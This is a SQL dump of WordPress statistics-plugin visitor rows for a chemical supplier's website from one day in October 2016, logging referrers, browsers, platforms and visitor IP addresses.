INSERT INTO `wp_statistics_visitor` VALUES (10028, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.25.132.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10029, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.254.124.12', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10030, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10031, '2016-10-22', 'https://www.google.co.in/', 'Firefox', 'Windows', '49.0', '', '103.251.80.136', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10032, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '20.0.1092.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10033, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.44.173.56', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10034, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '180.215.123.185', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10035, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.114.25.244', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10036, '2016-10-22', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwiNw9vvmO7PAhUB6iYKHc1aCNcQFggmMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw&bvm=bv.136593572,d.eWE', 'MSIE', 'Windows', '11.0', '', '108.26.177.186', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10037, '2016-10-22', 'https://www.miller-stephenson.com', 'Python-urllib', 'Unknown', '2.7', '', '192.99.71.186', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10038, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.50.131.96', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10039, '2016-10-22', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '107.3.95.149', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10040, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.251.196.104', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10041, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.68.244.82', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10042, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.225.77.71', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10043, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '196.207.248.93', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10044, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.115.90.247', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10045, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.150.255.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10046, '2016-10-22', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.25.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10047, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.253.12.103', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10048, '2016-10-22', 'https://www.google.pl/', 'Chrome', 'Android', '43.0.2357.93', '', '94.254.240.125', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10049, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.37.14.53', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10050, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '88.147.242.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10051, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.118.93.191', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10052, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10053, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '125.209.235.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10054, '2016-10-22', 'https://www.miller-stephenson.com/', 'AppleWebKit', 'Windows', '537.36', '', '125.209.235.170', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10055, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.70.51.51', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10056, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.124.100.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10057, '2016-10-22', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '208.102.19.208', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10058, '2016-10-22', 'https://www.miller-stephenson.com/wp-login.php', 'Firefox', 'Windows', '34.0', '', '84.254.8.55', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10059, '2016-10-22', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '46.11.136.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10060, '2016-10-22', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '107.3.95.149', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10061, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.234.16.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10062, '2016-10-22', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '172.245.236.61', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10063, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '2.0.0.1', '', '178.62.7.178', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10064, '2016-10-22', 'https://www.miller-stephenson.com', 'DowntimeDetector', 'Unknown', '1.0', '', '54.214.120.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10065, '2016-10-22', 'https://www.google.pl/', 'Firefox', 'Windows', '49.0', '', '83.10.195.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10066, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '27.251.53.59', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10067, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.195.243.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10068, '2016-10-22', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '208.42.251.123', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10069, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.168.81.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10070, '2016-10-22', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '73.16.179.221', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10071, '2016-10-22', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '166.216.165.53', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10072, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.124.154.220', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10073, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '35.160.112.191', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10074, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.180', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10075, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.187', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10076, '2016-10-22', 'https://www.google.co.uk/', 'Safari', 'iPhone', '10.0', '', '1.22.97.249', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10077, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.79.220.81', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10078, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.135.44.87', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10079, '2016-10-22', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '170.133.200.240', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10080, '2016-10-22', 'https://r.search.yahoo.com/_ylt=A0LEV0h2cwtYlHcAi9lx.9w4;_ylu=X3oDMTEydDM3MzhhBGNvbG8DYmYxBHBvcwM0BHZ0aWQDQjI4MTVfMQRzZWMDc3I-/RV=2/RE=1477174262/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2fsion%2f/RK=0/RS=jhR7qeszryVPdAYYti67iT3Ykbc-', 'Chrome', 'Android', '53.0.2785.124', '', '208.54.83.138', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10081, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.234.153.162', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10082, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.141.62.188', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10083, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.66.158.60', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10084, '2016-10-22', 'https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/', 'Safari', 'iPhone', '7.0', '', '131.253.26.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10085, '2016-10-22', 'https://frontpage.pch.com/search?x=128&y=27&q=ptfe+dry+mold+release&cat=web', 'Firefox', 'Windows', '49.0', '', '74.70.20.211', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10086, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.146.46.16', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10087, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.200.239.161', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10088, '2016-10-22', 'https://www.google.de/', 'Safari', 'Macintosh', '10.0', '', '82.58.13.131', '000', 21, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10089, '2016-10-22', 'https://meds-online24.com/', 'MSIE', 'Windows', '6.0', '', '46.211.197.241', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10090, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.162.39.254', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10091, '2016-10-22', 'https://1-99seo.com/try.php?u=https://www.miller-stephenson.com', 'Chrome', 'Windows', '36.0.1985.143', '', '187.183.33.179', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10092, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.36.151.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10093, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '90.189.120.90', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10094, '2016-10-22', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '202.65.158.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10095, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.222.14.9', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10096, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.123', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10097, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.124', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10098, '2016-10-22', 'https://www.miller-stephenson.com/mold-release-agents/', 'Safari', 'iPhone', '10.0', '', '70.209.144.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10099, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.69.107.120', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10100, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.70.117.99', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10101, '2016-10-22', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '32.209.25.215', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10102, '2016-10-22', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', 'or', '', '203.133.171.94', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10103, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.188.92.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10104, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.52.36.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10105, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '21.0', '', '46.229.173.131', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10106, '2016-10-22', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '5.1', '', '46.229.173.131', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10107, '2016-10-22', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '174.127.112.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10108, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.7.232.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10109, '2016-10-22', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '174.221.139.104', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10110, '2016-10-22', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.169.116.43', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10111, '2016-10-22', 'https://www.miller-stephenson.com/krytox/?print=y', 'MSIE', 'Windows', '9.0', '', '182.118.25.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10112, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '91.246.1.37', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10113, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '83.209.116.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10114, '2016-10-22', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10115, '2016-10-22', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '64.47.2.51', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10116, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '213.174.5.47', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10117, '2016-10-22', 'https://duckduckgo.com/', 'Firefox', 'Windows', '49.0', '', '47.189.1.105', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10118, '2016-10-22', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '601.5.17', '', '186.154.28.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10119, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '41.0.2282.1', '', '23.106.247.83', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10120, '2016-10-22', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '46.229.173.131', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10121, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.85.188.231', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10122, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '136.169.188.198', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10123, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.75', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10124, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10125, '2016-10-22', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '180.153.236.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10126, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '192.171.44.236', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10127, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10128, '2016-10-22', 'https://www.google.com/', 'Chrome', 'Windows', '51.0.0.11603', '', '24.249.123.118', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10129, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.255.40.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10130, '2016-10-22', 'https://www.miller-stephenson.com/product/ms-580582/', 'Chrome', 'Windows', '53.0.2785.143', '', '67.201.11.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10131, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.168.211.190', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10132, '2016-10-22', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '96.242.129.191', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10133, '2016-10-22', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10134, '2016-10-22', 'https://www.bing.com/search?q=heloxy+modifier+62&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.148', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10135, '2016-10-22', 'https://www.miller-stephenson.com/product/heloxy-62/', 'MSIE', 'Windows', '9.0', '', '204.79.180.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10136, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.136.187.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10137, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.39.137.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10138, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.194.49.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10139, '2016-10-22', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '24.4.121.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10140, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.43.142.94', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10141, '2016-10-22', 'https://r.duckduckgo.com/', 'MSIE', 'Windows', '11.0', '', '174.104.150.29', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10142, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '42.0.2311.152', '', '157.56.2.203', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10143, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.165.25.14', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10144, '2016-10-22', 'https://www.google.co.uk/', 'Safari', 'iPhone', '9.0', '', '217.34.46.44', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10145, '2016-10-22', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10146, '2016-10-22', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '184.59.96.115', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10147, '2016-10-22', 'https://www.miller-stephenson.com/product/epon-828/', 'Firefox', 'Windows', '45.0', '', '134.223.230.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10148, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.136', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10149, '2016-10-22', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '173.206.20.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10150, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '38.0.2125.102', '', '5.169.143.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10151, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.187.88.113', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10152, '2016-10-22', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '169.53.6.107', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10153, '2016-10-22', 'https://www.miller-stephenson.com', 'doczz', 'Unknown', 'Unknown', '', '78.47.27.170', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10154, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.57.29.175', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10155, '2016-10-22', 'https://www.directindustry.fr/fabricant-industriel/resine-epoxy-75302.html?originalFilter=6b52625a626a74647a69392b4b4e364f323845384142554e792b6e48654377354b2b6a5635445a506a66443967504f3237726271633547416334486a644b53544d41474b51733158716b7a4d2f5774386276564953475341666f6f4143726b4b6b4a794b4446592b44336c6d45724772344f483675352f776551534f767a626d4d484a79562f554e4d65364d66586941484d47396848502b33786f6446716d4b6f7978784734615463644243347844414f756e34484943544f70467a76782f4e686469717936637a476443466c5650386d62685376673d3d', 'Firefox', 'Windows', '49.0', '', '78.218.230.103', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10156, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.106.105.212', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10157, '2016-10-22', 'https://www.seeingmeerkat.com/', 'MSIE', 'Windows', '6.0', '', '46.118.118.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10158, '2016-10-22', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.192.212.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10159, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.28', '', '54.205.38.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10160, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.103.170.164', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10161, '2016-10-22', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CDAQFjAD&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fvazo_overview.html&ei=rdwLWJW7I6fJvAeDWQ&usg=AFQjCNESI5yDu11sJVIRdHyRBsQiHWCyHw', 'MSIE', 'Windows', '11.0', '', '66.102.6.121', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10162, '2016-10-22', 'https://www.miller-stephenson.com/chemicals/vazo-radical-initiators/', 'MSIE', 'Windows', '11.0', '', '66.102.6.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10163, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.140.78.78', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10164, '2016-10-22', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '75.133.101.118', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10165, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.163', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10166, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.55.79.75', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10167, '2016-10-22', 'https://www.google.co.uk/search?ei=beMLWKv7K4Wta4KtkeAH&q=krytox+205&oq=krytox+205&gs_l=mobile-gws-serp.12..41l2j0l2j0i22i30k1.14141.15440.0.21284.3.3.0.0.0.0.381.749.0j1j1j1.3.0....0...1c.1.64.mobile-gws-serp..0.3.745.MjJaVVdzm-4', 'Chrome', 'Android', '44.0.2403.133', '', '37.152.230.52', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10168, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '19.0.1061.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10169, '2016-10-22', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '67.189.222.58', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10170, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '10.0.648.204', '', '198.240.86.56', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10171, '2016-10-22', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.67.189.126', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10172, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.35.173.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10173, '2016-10-22', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '44.0.2403.133', '', '166.137.90.31', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10174, '2016-10-22', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiyxYO8we_PAhVBRCYKHZ8pBpsQFggfMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136593572,d.eWE', 'MSIE', 'Windows', '11.0', '', '134.223.230.156', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (10175, '2016-10-22', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.217.30.42', '000', 2, 0); 
